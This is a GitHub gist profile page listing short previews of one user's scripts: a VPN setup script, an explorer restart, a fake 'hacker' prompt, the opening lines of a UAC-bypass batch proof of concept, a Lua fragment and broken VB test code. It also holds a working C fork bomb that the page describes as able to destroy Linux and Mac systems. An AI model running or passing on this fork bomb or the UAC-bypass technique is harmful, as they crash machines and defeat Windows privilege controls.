Skip to content

Instantly share code, notes, and snippets.

View tnhung2011's full-sized avatar
🙃
<- fuckign face

Vichy tnhung2011

🙃
<- fuckign face
View GitHub Profile
@tnhung2011
tnhung2011 / Vichy's GitHub Stats
Last active April 11, 2022 18:20
tnhung2011's GitHub Stats
⭐ Total Stars: 0
➕ Total Commits: 109
🔀 Total PRs: 26
🚩 Total Issues: 12
📦 Contributed to: 23
@tnhung2011
tnhung2011 / CreateSystemVPN.ps1
Last active February 6, 2022 02:58 — forked from bytespec/CreateSystemVPN.ps1
Example PowerShell code to create a system (all users) SSTP VPN. Use a .cmd file as a launcher within a .scapp file for an almost-one-click deploying via Screen Connect's Toolbox in Backstage mode.
# (a fork of https://gist.github.com/bytespec/862c8f370d6018c76d6122ca423c16cf)
# Parameter defaults
param(
[Parameter()]
[String]$VPN_NAME = 0
[String]$SERVER = 0
[String]$SPLIT = $false
[String[]]$ROUTES = 0 # Empty or set $SPLIT to false to disable tunneling
[String]$USER = 0
@tnhung2011
tnhung2011 / reexplorer.bat
Last active November 17, 2022 14:21
ReExplorer: Restart explorer.exe
@echo off
echo [+] Restarting explorer.exe...
taskkill /f /im explorer.exe >nul
timeout 2 >nul
start %systemroot%\explorer.exe
echo [+] Starting explorer.exe...
set /p _p=
@tnhung2011
tnhung2011 / HackerShell.bat
Last active August 29, 2022 01:07
Totally a fake shell to fool Command Prompt itself
@echo off
title Hacker Shell
color 02
prompt $$$S
doskey clear=cls
cls
echo Welcome to the Hacker Shell!
echo Credits to tnhung2011 for this :)
echo.
cmd /k
@tnhung2011
tnhung2011 / UAC-Bypass.bat
Last active March 15, 2022 09:19
A Batch concept of a vulnerability in Windows 10 discovered by Cristian B. (Please note: This is a Proof of Concept and is not intended for illegal usage!)
@echo off
rem Other bindings:
rem - https://github.com/winscripting/UAC-bypass
rem - https://gist.github.com/tommelo/07dacce52664a35d2938a55d96bc8ac5
set null=
set program=%*
if exists %program% (
rem Create registry structure
if (game:IsLoaded() == false) then
game.Loaded:Wait()
end
local plrs = game:GetService("Players")
local connections = {}
for _,anti in pairs(plrs:GetPlayers()) do
if anti ~= plrs.LocalPlayer then
connections[anti.Name] = {}
@tnhung2011
tnhung2011 / forkbomb.c
Last active August 29, 2022 02:27
A list of fork bombs that could destroy both Linux and Macs
#include <unistd.h>
int main() {
while(1) fork();
return 0;
}
@tnhung2011
tnhung2011 / test.vb
Last active November 24, 2021 01:00 — forked from octocat/test.cs
Module Module1
Sub Main()
"There it is"
End Sub
End Module